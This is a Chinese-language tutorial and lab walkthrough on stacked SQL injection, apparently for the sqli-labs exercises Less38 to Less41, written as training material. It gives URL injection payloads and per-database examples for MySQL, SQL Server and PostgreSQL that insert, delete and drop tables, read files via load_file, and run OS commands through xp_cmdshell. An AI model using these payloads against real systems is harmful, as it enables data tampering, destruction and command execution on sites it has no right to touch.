Less38 ，39，40，41【堆疊注入】 示例

Less38為堆疊注入，前提是對各個表的列名瞭解，進而增刪改查 ?id=2';insert into users(id,username,password) values('16','zha1o','password') --+ Less39與less38區別在於閉合符號，39無閉合符號 ?id=1;insert into users(id,username,password) values('17','test','passw0rd')--+ less40與上面相似，閉合符號為(' ')，圖略 ?id=2');insert into users(id,username,password) values('19','test','passw0rd')--+ less41為盲注，無回顯，其他一致 無閉合符號 ?id=2 ;insert into users(id,username,password) values('20','test','passw0rd')--+

0x00 堆疊注入定義

Stacked injections(堆疊注入)從名詞的含義就可以看到應該是一堆 sql 語句(多條)一起執行。而在真實的運用中也是這樣的, 我們知道在 mysql 中, 主要是命令列中, 每一條語句結尾加; 表示語句結束。這樣我們就想到了是不是可以多句一起使用。這個叫做 stacked injection。

0x01 堆疊注入原理

在SQL中，分號（;）是用來表示一條sql語句的結束。試想一下我們在;結束一個sql語句後繼續構造下一條語句，會不會一起執行？因此這個想法也就造就了堆疊注入。而unioninjection（聯合注入）也是將兩條語句合併在一起，兩者之間有什麼區別麼？區別就在於union或者unionall執行的語句型別是有限的，可以用來執行查詢語句，而堆疊注入可以執行的是任意的語句。例如以下這個例子。使用者輸入：1;DELETEFROMproducts伺服器端生成的sql語句為： Select*fromproductswhereproductid=1;DELETEFROMproducts當執行查詢後，第一條顯示查詢資訊，第二條則將整個表進行刪除。

0x02 堆疊注入的侷限性

堆疊注入的侷限性在於並不是每一個環境下都可以執行，可能受到API或者資料庫引擎不支援的限制，當然了許可權不足也可以解釋為什麼攻擊者無法修改資料或者呼叫一些程式。

此圖是從原文中擷取過來的，因為我個人的測試環境是php+mysql，是可以執行的，此處對於mysql/php存在質疑。但個人估計原文作者可能與我的版本的不同的原因。雖然我們前面提到了堆疊查詢可以執行任意的sql語句，但是這種注入方式並不是十分的完美的。在我們的web系統中，因為程式碼通常只返回一個查詢結果，因此，堆疊注入第二個語句產生錯誤或者結果只能被忽略，我們在前端介面是無法看到返回結果的。因此，在讀取資料時，我們建議使用union（聯合）注入。同時在使用堆疊注入之前，我們也是需要知道一些資料庫相關資訊的，例如表名，列名等資訊。

0x03 各個資料庫例項介紹

本節我們從常用資料庫角度出發，介紹幾個型別的資料庫的相關用法。資料庫的基本操作，增刪查改。以下列出資料庫相關堆疊注入的基本操作。

1.Mysql

（1）新建一表

select * from users where id=1;create table test like users;

執行成功，我們再去看一下是否新建成功表。

（2）刪除上面新建的test表

select * from users where id=1;drop table test;

（3）查詢資料

select * from users where id=1;select 1,2,3;

（4）載入檔案

select * from users where id=1;select load_file('c:/tmpupbbn.php');

(4) 修改資料

select * from users where id=1;insert into users(id,username,password) values ('100','new','new');

2. Sql server

(1)增加資料表

select * from test;create table sc3(ss CHAR(8));

(2) 刪除資料表

select * from test;drop table sc3;

(4)查詢資料

select 1,2,3;select * from test;

(5)修改資料

select * from test;update test set name='test' where id=3;

(5)sqlserver中最為重要的儲存過程的執行

select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

3.Oracle

上面的介紹中我們已經提及，oracle不能使用堆疊注入，可以從圖中看到，當有兩條語句在同一行時，直接報錯。無效字元。後面的就不往下繼續嘗試了。

4.Postgresql

(1)新建一個表

 select * from user_test;create table user_data(id DATE);

可以看到user_data表已經建好。

(2)刪除上面新建的user_data表

select * from user_test;delete from user_data;

(3)查詢資料

select * from user_test;select 1,2,3;

(4) 修改資料

 select * from user_test;update user_test set name='modify' where name='張三';